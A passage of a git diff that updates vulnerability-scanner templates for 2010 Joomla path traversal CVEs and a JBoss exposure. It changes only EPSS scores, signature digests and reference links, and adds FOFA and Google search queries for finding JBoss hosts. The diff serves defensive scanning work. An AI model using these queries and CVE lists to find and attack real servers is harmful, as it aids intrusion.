cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022033efcff5dab3e96c4bd25ffd1f08b5d509129b21c1952b48f4c5f5bce1845b20022100dc3da12554c6710754770645dcafc258f15112fee5ae614da245894df5d37c91:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dc0516314760341830b6d829ac3d71cca66d790eed97e8c05aecafcac46e6b47022100c7ad39fcf6a99cad4066323df1b8cea073d37e4621111901fca6e3879bac4fb8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml
index f40d55c22e..c63bf2f5e1 100644
--- a/http/cves/2010/CVE-2010-0942.yaml
+++ b/http/cves/2010/CVE-2010-0942.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-0942
cwe-id: CWE-22
epss-score: 0.00477
- epss-percentile: 0.75244
+ epss-percentile: 0.75733
cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022049a324c195808d1ac76829b45e8f27b6cd31e1527fcbe5131d00a009b78b98b7022100e3e31759811d9e4b4f7781ef77c85f6e426853daf5f1d8eaf52e966c01f8a88e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f696085a166eff1a9f78532c3fe14ed4163e59d9a96908e4ec91a0ee7bed142102210087f7ea06c03263d733dbbe87ff98cd03fba93940a5c21b9f889f1e6440fdc566:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml
index ed8e98f25b..ff6e05ec42 100644
--- a/http/cves/2010/CVE-2010-0972.yaml
+++ b/http/cves/2010/CVE-2010-0972.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-0972
cwe-id: CWE-22
epss-score: 0.00813
- epss-percentile: 0.81406
+ epss-percentile: 0.81755
cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d3a39a822ed7fbffac4de0f1b0254ff4507f47002fe439be08c0983ec7a8613d022100958197a26e1b207a6910133f8e31baf385295e45ef9b589a8961292891f251c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440221008b9b59ffe3a50d64b3f18bb536f33fd35a3ab75c754ae5c347a93e5d240d4935021f796f07c35c8be0129aea12df6402810bd7a4197f0e7223ddc3a8488839c308:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml
index 902e5d7506..0cc9627d7f 100644
--- a/http/cves/2010/CVE-2010-1081.yaml
+++ b/http/cves/2010/CVE-2010-1081.yaml
@@ -12,13 +12,14 @@ info:
- https://www.exploit-db.com/exploits/11511
- https://nvd.nist.gov/vuln/detail/CVE-2010-1081
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1081
cwe-id: CWE-22
- epss-score: 0.0168
- epss-percentile: 0.8632
+ epss-score: 0.37754
+ epss-percentile: 0.97206
cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022020268f779e361916bc07ce33e39192307f3bce053f3a189e088b1f836199e7ca02201a54a5155fcfc628c13a0d8282ac74dba004ed58582cdf30fad1985c90f82252:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220228cf9600a1dd63059d5e2ae690546f448bb168b4aac5013ee1511b66f279402022100c2aed62495d6728080edeb426772b88be9b02b07d3c183921755b2758ef70cbc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml
index e805a95731..7ec6beb698 100644
--- a/http/cves/2010/CVE-2010-1305.yaml
+++ b/http/cves/2010/CVE-2010-1305.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1305
cwe-id: CWE-22
epss-score: 0.03203
- epss-percentile: 0.90236
+ epss-percentile: 0.91191
cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221008359d835a31bb6cdf1904ec4e2657c736624dfcfa5fcd01f3a02a8257d33048d02204b9552e1cb25efd557234b0af9313dd2f5474de89c5865b764178e1d4d38905e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207ff5ab30f4234618c6cb8ff8937b8c3f026fa22540c30e4723be09fd9a170bd7022018299b594c95012ccccd91e2464086eb0b75f168ba8b37e2befe9afb330da921:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml
index 28fd60e49b..d95f88f4a9 100644
--- a/http/cves/2010/CVE-2010-1306.yaml
+++ b/http/cves/2010/CVE-2010-1306.yaml
@@ -19,7 +19,7 @@ info:
cve-id: CVE-2010-1306
cwe-id: CWE-22
epss-score: 0.01242
- epss-percentile: 0.85196
+ epss-percentile: 0.85468
cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220548521f736459dae087d6a2bd94e3ae9773f5b831cff83356187c4188522b8f802201265d0b432dbacee031aaaf9bcbc72699612e5e25f881527cde284df0d35481c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b69a0ddb75fe5a6e5e5da5c2cffef27949528448bd76ee69133c23453fe51e5e022100f835ef8902e4b818d7e38d065ff2246d9bad77fd846cd678376cc369edc01934:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml
index 118251644b..909abd19f3 100644
--- a/http/cves/2010/CVE-2010-1307.yaml
+++ b/http/cves/2010/CVE-2010-1307.yaml
@@ -13,13 +13,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2010-1307
- http://www.vupen.com/english/advisories/2010/0806
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57531
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1307
cwe-id: CWE-22
epss-score: 0.01751
- epss-percentile: 0.86604
+ epss-percentile: 0.87931
cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205ee411e0df19bcb5be4939061e5b85f81c3ee3250e70223ecf19da638a332c6802207f1fbb956555429b3a2c32ad9d53e161530e3ebb76b3b8fafbc6483ff62c0d35:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022057b70110c3230255acf102d97928955ea4da363451c17f6c961dc10b8888192e022100bbcfb911dd6c03f2fb6017baa145fe3fc559aff548f13cd010ead3675f18379a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml
index 0910a8204d..f23784557e 100644
--- a/http/cves/2010/CVE-2010-1308.yaml
+++ b/http/cves/2010/CVE-2010-1308.yaml
@@ -19,7 +19,7 @@ info:
cve-id: CVE-2010-1308
cwe-id: CWE-22
epss-score: 0.01334
- epss-percentile: 0.85765
+ epss-percentile: 0.86023
cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c29bf12509751c6d4971b808635de57b7692d9e53df31d4b294649bb5ce456db022100bd518edc4ef976a87843b5cf5c4eec01353017a668000897cd0020a9fd09f094:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100faf98bf9bc8f8cb6dedd82ccb2b5cf49ddafd0119858f6e6d38c60ee7d0e8caa02210090d3d8e293050de920c56613510427d16875207dd02019d3185c7209dd3d46b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml
index 07ceab2896..dfa30448fc 100644
--- a/http/cves/2010/CVE-2010-1312.yaml
+++ b/http/cves/2010/CVE-2010-1312.yaml
@@ -19,7 +19,7 @@ info:
cve-id: CVE-2010-1312
cwe-id: CWE-22
epss-score: 0.01155
- epss-percentile: 0.83338
+ epss-percentile: 0.84812
cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100d20ace89e5fba9e38e12b29dcdf7f94465027da5466716242a9d9a23d933a1b202200ead3153d09e06b648a9c10ea73a58a9c85db18e8c136d6d177acdccb61f00fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220027648d4d4ad81d25673691592a865aeba4edbbc49bb98f22254932f7cdf8396022100ec67dfc163a844ed2d62e9bd3f63faf0afa4b51563dd5801c7926ddfe9caa690:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml
index d274284b73..def3364414 100644
--- a/http/cves/2010/CVE-2010-1313.yaml
+++ b/http/cves/2010/CVE-2010-1313.yaml
@@ -12,13 +12,14 @@ info:
- https://www.exploit-db.com/exploits/12082
- https://nvd.nist.gov/vuln/detail/CVE-2010-1313
- http://www.exploit-db.com/exploits/12082
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2010-1313
cwe-id: CWE-22
epss-score: 0.0045
- epss-percentile: 0.72402
+ epss-percentile: 0.75061
cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e2ee5113ea7ef6e40728910e3d42e905985b5b2f7ce07d14947241170a9a1dc9022029c4419ef7ee627daa6f2d32119c452f396ae07a75d68bf757f8b36f3d72279e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022015eb2f0633d1f1761aea73ac49a32a8c5f3f8d52eecf57edb76e58079036a216022047fcebd5259f4ddad0914d300ae4a4c5a374c3268897da3a734c54f4d85e3af7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml
index 74233ba758..f5d88de998 100644
--- a/http/cves/2010/CVE-2010-1353.yaml
+++ b/http/cves/2010/CVE-2010-1353.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2010-1353
cwe-id: CWE-22
epss-score: 0.01751
- epss-percentile: 0.87665
+ epss-percentile: 0.87931
cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022043fd12edb4a3a2a5476d0728b0371efefd549591b361970554bafd57766a5a7d0220319e614d046afdbc29519ddcf8c1b48b88a98655409e986e93b30e09366c7a41:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220728d14721e7ffc97ae9101ec0a228589c6011874540942b1d947853989146acc022018abc77016af7a2f966797453910f502c217cd7ceee10b418b87b92ab3463193:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml
index 889e71aa9f..7eb0ab1afe 100644
--- a/http/cves/2010/CVE-2010-1354.yaml
+++ b/http/cves/2010/CVE-2010-1354.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1354
cwe-id: CWE-22
epss-score: 0.00477
- epss-percentile: 0.73222
+ epss-percentile: 0.75733
cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402203e7b0577bb4c487c2041c049e54955ba57fcef21993bed3ee4a35397e5093009022012c708fe0fd04232b8a6542de8c0b947b5f72f266a2755b9ec230c1503415d79:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207c61a8164fb31e72e6d98d6260e87eac00a5d414c127812939b6c3d4d5a65df3022100dc45b24eeb28c01993ffca9fec8ecfffa0f755494cb81ecfa6a918a770c9f9e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml
index 29f5fdfb93..2bacf238d4 100644
--- a/http/cves/2010/CVE-2010-1429.yaml
+++ b/http/cves/2010/CVE-2010-1429.yaml
@@ -30,6 +30,8 @@ info:
vendor: redhat
product: jboss_enterprise_application_platform
shodan-query: title:"JBoss"
+ fofa-query: title="jboss"
+ google-query: intitle:"jboss"
tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat
http:
@@ -49,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100bdd3f2bcbf92f7f9b377bef80acf174a216abb0cb2acf3477efe856c2083c07702203e9b25701cd0278ddb795ca72e40c2c00dcb6e3924b009706b93a3f0d6416eac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220724f85157044c11062097b6d4872436522fc35cb4dcf3b20b1f10d928f1d19e3022100adad2cda8f2a65281164fc4a29c8a5d4a93992b73827a47b74c5d1a3b0065733:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml
index 7cbc8e5249..7761bd9783 100644
--- a/http/cves/2010/CVE-2010-1461.yaml
+++ b/http/cves/2010/CVE-2010-1461.yaml
@@ -12,13 +12,14 @@ info:
- https://www.exploit-db.com/exploits/12232
- https://nvd.nist.gov/vuln/detail/CVE-2010-1461
- http://www.exploit-db.com/exploits/12232
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-1461
cwe-id: CWE-22
epss-score: 0.00477
- epss-percentile: 0.73149
+ epss-percentile: 0.75733
cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402207a92c230e02820f5272be13d2ee12a3e2739ac81ac8868dfbbe2ff407522df0c0220517ba0c636efa561e00528f86bcb0cdb861bc0e5382c72f4cb8f11b5fffc3b89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dbfd8ea48c7ea963bf75e063f39dbb19633a7c111461cac4147532d71730a760022100831035f38425d12cc8628ada6e4deb423bc4abc0a38e3e8327de12cba5d4c203:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml
index 2412d6d079..571332b9ac 100644
--- a/http/cves/2010/CVE-2010-1469.yaml
+++ b/http/cves/2010/CVE-2010-1469.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1469
cwe-id: CWE-22
epss-score: 0.00813
- epss-percentile: 0.81406
+ epss-percentile: 0.81755
cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206c63f224a283f97a55ae4941e39f19ae06e9761cf123943f1b4d394ecef11ea9022100d2900835201e1b12398af58927fbaada9d98b609932bfc9f70d7c6263a16a705:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100844dd8dd2eae03a8b5ffcd18a6903d89b7f1036f0e18a48b7d7a33905d9778dd022100b46694882b7e3cd5476bbb1f4cf5c11665b30414e1bc6de9889ce5c403770fcd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml
index 343bae62dc..7473a66a17 100644
--- a/http/cves/2010/CVE-2010-1471.yaml
+++ b/http/cves/2010/CVE-2010-1471.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1471
cwe-id: CWE-22
epss-score: 0.05684
- epss-percentile: 0.93171
+ epss-percentile: 0.93322
cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100ce9830af0a126d6aae7b0cbe9b7598011f30691e6f9066386c81c9fb4bf3c1bc022014f94fe6e238d285a780454bb05c33859277fe46440a3a38ce33dd5a9d376175:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220494054249b8e4d7f93dbc0217e276a6b901834b92d67035bfbf8823272a12584022100cf4b2371066ea4cbcb01dcec2a5462226e0745a71aa82ef45e1702a49ee05d68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml
index a26d5378db..52679b2e54 100644
--- a/http/cves/2010/CVE-2010-1473.yaml
+++ b/http/cves/2010/CVE-2010-1473.yaml
@@ -19,7 +19,7 @@ info:
cve-id: CVE-2010-1473
cwe-id: CWE-22
epss-score: 0.00826
- epss-percentile: 0.80104
+ epss-percentile: 0.8192
cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100caea4647de08403d53042f0568175efd2710e43a5d7e4962fcdb653206899ef802204d6c39e2e96c51b1626db9d90b0417e114debda8ef2844386f4faaa68630e512:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203bb985e9373625d3f78d831ec8f0ea16e5f05271a6a438f282ef535e526d2be9022100f8466a6d8c383a398c2c891afeefdcd309f332a76e51078dc142e1982b239bee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml
index ab3290bddd..b656913c78 100644
--- a/http/cves/2010/CVE-2010-1474.yaml
+++ b/http/cves/2010/CVE-2010-1474.yaml
@@ -14,13 +14,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2010-1474
- http://www.exploit-db.com/exploits/12182
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57662
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2010-1474
cwe-id: CWE-22
epss-score: 0.01242
- epss-percentile: 0.83996
+ epss-percentile: 0.85468
cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210092cb1f73ab7dcae152bc21fe109528bd68ddf3cb5c508c1c4ba81eb03a062e0f022100d32c234d25d1101db43416910efd4e3e67f536d43d1ed0a150d56605181bc34f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100eadc940751fa801f31bd9431865a1348c1f01b754fdecf114d6900e0bc46966a022100a8eef2e4dd1939224c45d659610ed1d33481c91c5055014673be55c6c96f3e44:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml
index 0710e11ab6..dec4bc95c4 100644
--- a/http/cves/2010/CVE-2010-1476.yaml
+++ b/http/cves/2010/CVE-2010-1476.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1476
cwe-id: CWE-22
epss-score: 0.03527
- epss-percentile: 0.90668
+ epss-percentile: 0.91571
cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e223bbab6d530ae6a44d3bd78a373853c5148f44c8fc760b86463968a99c39260220014aad890aabb37a243d84a97dc63c543133a8974a8c00e2b56a558e85a93be3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220531dcb18e8f2b71dbb39f860cc4850ffd43574870cced6d1c14fa79a91dcc92b022100b113da3738595c7563a2e04bdecc3d3e47efe77caef58b89fd6e5f8a590a5fcf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml
index 69adbf9bbd..78e7aee8ea 100644
--- a/http/cves/2010/CVE-2010-1494.yaml
+++ b/http/cves/2010/CVE-2010-1494.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1494
cwe-id: CWE-22
epss-score: 0.01827
- epss-percentile: 0.86946
+ epss-percentile: 0.88212
cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022078af0a2572ae5f8b2c1663f51eada15aaf88e88ddd86c86885239309dfc1cad3022004c0a80a0505a5b96aa016ae9b7c502555783290a05b5589d8a9677dcabefefe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220546ac5f56c9b94a44e941e632a9b307d80f472cc78e438065d385bcc5fec50c60221009b72878dc057fb94cdea625001bce4ecd0f230639b3f0a01e4fb43ac3892436e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml
index a3f6f5ad1f..c70c75a4af 100644
--- a/http/cves/2010/CVE-2010-1532.yaml
+++ b/http/cves/2010/CVE-2010-1532.yaml
@@ -19,7 +19,7 @@ info:
cve-id: CVE-2010-1532
cwe-id: CWE-22
epss-score: 0.00477
- epss-percentile: 0.75244
+ epss-percentile: 0.75733
cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210093ee4b75fd03b95c7cf1b62869f48b19b4cd257e9b6ee4e7a9ddd9ebdeba739f022100d1cd3032f304650a027ad4a1645ed98ff12691f89b7e9116d244291df5398606:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205caacbaf2ced111a394d679ebcbfb86ab6f023380a04a9d6c7697916e3b76e43022056232dd3d5468b234d0d1cdaf03f2e753d6a0eadf807d281785b2f8c65dd7b2b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml
index a6e5e7208e..87d05d92fd 100644
--- a/http/cves/2010/CVE-2010-1533.yaml
+++ b/http/cves/2010/CVE-2010-1533.yaml
@@ -19,7 +19,7 @@ info:
cve-id: CVE-2010-1533
cwe-id: CWE-22
epss-score: 0.00706
- epss-percentile: 0.79951
+ epss-percentile: 0.80337
cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100eedf4edbfe23d403bdd5c5489b678f09c60e2a4eb686e7fa5f90c08137b92d54022100e22396a012f39f1ae9f4950b22031a7521a366a61411f98a4f3323782f5e2eaa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207de073fa377307af9bd3d0b3406ad3f9681feb1ca46031ccfcb6ed7561fc4a940220077be57fecc58376b676559e9e3dae1c8c8a0868e3d9b9654d949e981ad93d8b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml
index 06afaa24fb..497cc14171 100644
--- a/http/cves/2010/CVE-2010-1534.yaml
+++ b/http/cves/2010/CVE-2010-1534.yaml
@@ -18,7 +18,7 @@ info:
cve-id: CVE-2010-1534
cwe-id: CWE-22
epss-score: 0.01385
- epss-percentile: 0.86058
+ epss-percentile: 0.86323
cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +40,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022040ad70967db9eabb2f9a61956bb22a2cb03a60da3fd695753b8fc46da9eb48e3022071b38622330ce4f8a704bb116b35a8279a76512268663ad681d5360a49288372:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220627c0439bed5f9c857145fb35f1a5e4152607d796e171b2b35aab09be7387341022066442ae0a3a5ca34a7cc9658c5644f13efdf60281a3652b3a95f493277194bcd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml
index b1ef080b2e..665b8757a7 100644
--- a/http/cves/2010/CVE-2010-1535.yaml
+++ b/http/cves/2010/CVE-2010-1535.yaml
@@ -13,13 +13,14 @@ info:
- https://www.exploit-db.com/exploits/12151
- https://nvd.nist.gov/vuln/detail/CVE-2010-1535
- http://www.exploit-db.com/exploits/12151
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-1535
cwe-id: CWE-22
epss-score: 0.00706
- epss-percentile: 0.78254
+ epss-percentile: 0.80337
cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502210081ae121f8d5b40c99be54953f4642587c68241fe48f2df08217c1a01ea61731502201393c0f1a4c9d6e00e2fd41022df88c7a15e3bc678a5eaf99634e69b735ab26a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022064230d9af661b0cb073113c4d0f724c89a82b08fcab9006563ef55a52a4825a40221009d1b17512cd61af4cc7e16ec02bb3451760585297295375e21604a3c784b1984:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml
index 82d4d0479b..ccbf3c44ed 100644
--- a/http/cves/2010/CVE-2010-1602.yaml
+++ b/http/cves/2010/CVE-2010-1602.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2010-1602
cwe-id: CWE-22
epss-score: 0.03451
- epss-percentile: 0.91267
+ epss-percentile: 0.91491
cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205e094a51db98044850affaa030835374e20660764cfd65e9a367c5012aa6741c02207e065ab9927fef891678a4c7c425734e4e0c1c040f73d6e9a60c9ab7b3b9bfd2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a0eeca7aba4d9618dbe8ca061a7589c36f2b6768e904f2b92e36691632e3cc0a022100bcb42d40cbb3d6a870475dd714f9ca84ad666d622dac96e9707a9253f85c0183:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml
index ba9f57adb0..0aa7d29812 100644
--- a/http/cves/2010/CVE-2010-1607.yaml
+++ b/http/cves/2010/CVE-2010-1607.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2010-1607
cwe-id: CWE-22
epss-score: 0.01726
- epss-percentile: 0.87577
+ epss-percentile: 0.87848
cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
